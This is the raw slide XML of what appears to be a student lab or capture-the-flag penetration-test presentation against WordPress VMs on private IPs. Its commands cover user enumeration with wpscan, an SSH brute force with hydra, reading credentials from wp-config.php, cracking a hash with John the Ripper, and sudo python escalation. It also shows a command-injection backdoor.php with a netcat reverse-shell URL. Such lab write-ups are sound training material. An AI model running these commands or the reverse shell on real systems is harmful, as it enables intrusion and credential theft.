        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13253075" y="1675225"/>
            <a:ext cx="10393126" cy="11543975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="190" name="Google Shape;190;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767626" y="8765575"/>
            <a:ext cx="4485450" cy="445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196" name="Google Shape;196;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197" name="Google Shape;197;p28"/>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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find users/authors of this WordPress website can help attackers craft an approach as part of a larger attack.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-469900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve?</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version 3.7.8</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returns: WordPress version 4.8.15 is used on this website.</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Research known vulnerabilities of version 4.8.15</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Enumerate Users via “Author ID Brute Forcing”</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-469900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did you exploit the vulnerability?</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Users(s) Identified: steven &amp; michael</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Confirmed by: Login Error Messages </a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-469900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800"/>
              <a:t>Command:</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-469900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wpscan --url </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.1.110/wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --enumerate u</a:t>
            </a:r>
            <a:endParaRPr sz="3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203" name="Google Shape;203;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204" name="Google Shape;204;p29"/>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2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WPScan determines WordPress version 4.8.7 is vulnerable to “Author ID Brute Forcing” attacks.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="205" name="Google Shape;205;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="594477" y="2754450"/>
            <a:ext cx="10347259" cy="10358350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="206" name="Google Shape;206;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10941726" y="2754451"/>
            <a:ext cx="13060526" cy="687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12" name="Google Shape;21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213" name="Google Shape;213;p3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775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Using xHydra software -- a network logon cracker</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brute force attack on Apache server</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User Michael password found.</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Password: “michael”</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Command:</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hydra -s 22-l michael -P /usr/share/wordlists/rockyou.txt -t16 192.168.1.110 ssh</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login command: root@Kali:~# ssh 192.168.1.110 -l michael</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michael@192.168.1.110’s password: “michael”</a:t>
            </a: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14" name="Google Shape;214;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16998050" y="1759900"/>
            <a:ext cx="6648126" cy="506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20" name="Google Shape;22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221" name="Google Shape;221;p3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Remote development/author access to Webserver1 (Target 1 VM)</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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22" name="Google Shape;222;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="322100" y="3113163"/>
            <a:ext cx="9315450" cy="10106025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="223" name="Google Shape;223;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9637538" y="3075063"/>
            <a:ext cx="9382125" cy="10182225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="224" name="Google Shape;224;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12933000" y="3630133"/>
            <a:ext cx="11477301" cy="6901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800"/>
              <a:t>Exploitation: V4 “Root Password of the Database in the Config File”</a:t>
            </a:r>
            <a:endParaRPr sz="5800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;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
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514375" y="2295400"/>
            <a:ext cx="9124500" cy="8666700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="70000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-357505" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did you exploit the vulnerability?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into Michael’s account.</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Located the wp-config.php file and discovered the MySQL database login credentials.</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-357505" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve?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Obtained database MySQL login credentials.</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-357505" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900"/>
              <a:t>Commands:</a:t>
            </a:r>
            <a:endParaRPr sz="2900"/>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michael@192.168.1.110</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find -iname wp-config.php</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cd /var/www/html/wordpress</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cat wp-config.php</a:t>
            </a:r>
            <a:endParaRPr sz="29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2" name="Google Shape;232;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8370000" y="1575600"/>
            <a:ext cx="16007649" cy="11763101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Google Shape;233;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8370000" y="1575600"/>
            <a:ext cx="7965000" cy="28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4" name="Google Shape;234;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8370000" y="7911000"/>
            <a:ext cx="5400000" cy="156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35" name="Google Shape;235;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772125" y="8271375"/>
            <a:ext cx="6033575" cy="48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1" name="Google Shape;241;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
        <p:nvSpPr>
          <p:cNvPr id="242" name="Google Shape;242;p33"/>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fontScale="775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First started the database with command: mysql -u root -p wordpress</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In MySQL database, commands;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Show tables;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select * from wp_users;	</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Extracted user Steven’s unsalted password hash from MySQL database saved to wp_hash.txt</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Cracked the hash with John the Ripper</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Password: “pink84”</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into user Steven’s account</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-445135" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escalated to root via sudo python</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="243" name="Google Shape;243;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13845875" y="7333250"/>
            <a:ext cx="9652943" cy="58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9" name="Google Shape;249;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pic>
        <p:nvPicPr>
          <p:cNvPr id="250" name="Google Shape;250;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1575600"/>
            <a:ext cx="15083168" cy="11519400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="251" name="Google Shape;251;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12625781" y="1764600"/>
            <a:ext cx="11425425" cy="490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57" name="Google Shape;257;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pic>
        <p:nvPicPr>
          <p:cNvPr id="258" name="Google Shape;258;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4904400" y="1726138"/>
            <a:ext cx="15083174" cy="2885813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="259" name="Google Shape;259;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537963" y="4611950"/>
            <a:ext cx="11816050" cy="7324800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="260" name="Google Shape;260;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4766325" y="10533475"/>
            <a:ext cx="1771650" cy="85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66" name="Google Shape;266;p3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19</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;267;p3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Target 2</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68" name="Google Shape;268;p3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Table of Contents</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;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a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p1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17" name="Google Shape;117;p1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This document contains the following resources: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p19"/>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Network Topology &amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p19"/>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Part 1: Offensive Analysis</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p19"/>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2: Defensive Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p19"/>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3: Network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Brute-forceable URL directories and files”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;274;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275" name="Google Shape;275;p37"/>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Used the tool gobuster for URL directory brute force attack </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76" name="Google Shape;276;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788775" y="4596725"/>
            <a:ext cx="17710625" cy="8516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“V2 Netcat reverse shell/remote execution vulnerability”</a:t>
            </a:r>
            <a:endParaRPr sz="5660"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;28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283" name="Google Shape;283;p38"/>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Exploit.sh</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84" name="Google Shape;284;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5954725" y="4827275"/>
            <a:ext cx="8983776" cy="2530450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="285" name="Google Shape;285;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9664925" y="6529950"/>
            <a:ext cx="8721650" cy="8265849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="286" name="Google Shape;286;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="668338" y="4827275"/>
            <a:ext cx="5286375" cy="65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“V3 Unrestricted access to WordPress directories”</a:t>
            </a:r>
            <a:endParaRPr sz="5660"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Google Shape;292;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
        <p:nvSpPr>
          <p:cNvPr id="293" name="Google Shape;293;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3408175"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Once we executed the exploit.sh file using a command injection attack, we had full access to the directories.</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94" name="Google Shape;294;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3684800" y="5068524"/>
            <a:ext cx="14981926" cy="672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b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Google Shape;300;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sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;301;p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b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor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What kind of backdoor did you install (reverse shell, shadow user, etc.)?\</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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse shell/backdoor.php with netcat listner</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did you drop it (via Metasploit, phishing, etc.)? </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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Command injection attacks</a:t>
            </a:r>
            <a:endParaRPr sz="4400" i="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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http://192.168.1.115/contact.php</a:t>
            </a:r>
            <a:endParaRPr sz="4400" i="1">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do you connect to it? </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.115/backdoor.php?cmd=nc%20192.168.1.90%204444%20/bin/bash</a:t>
            </a:r>
            <a:endParaRPr sz="4400" i="1">
              <a:solidFill>
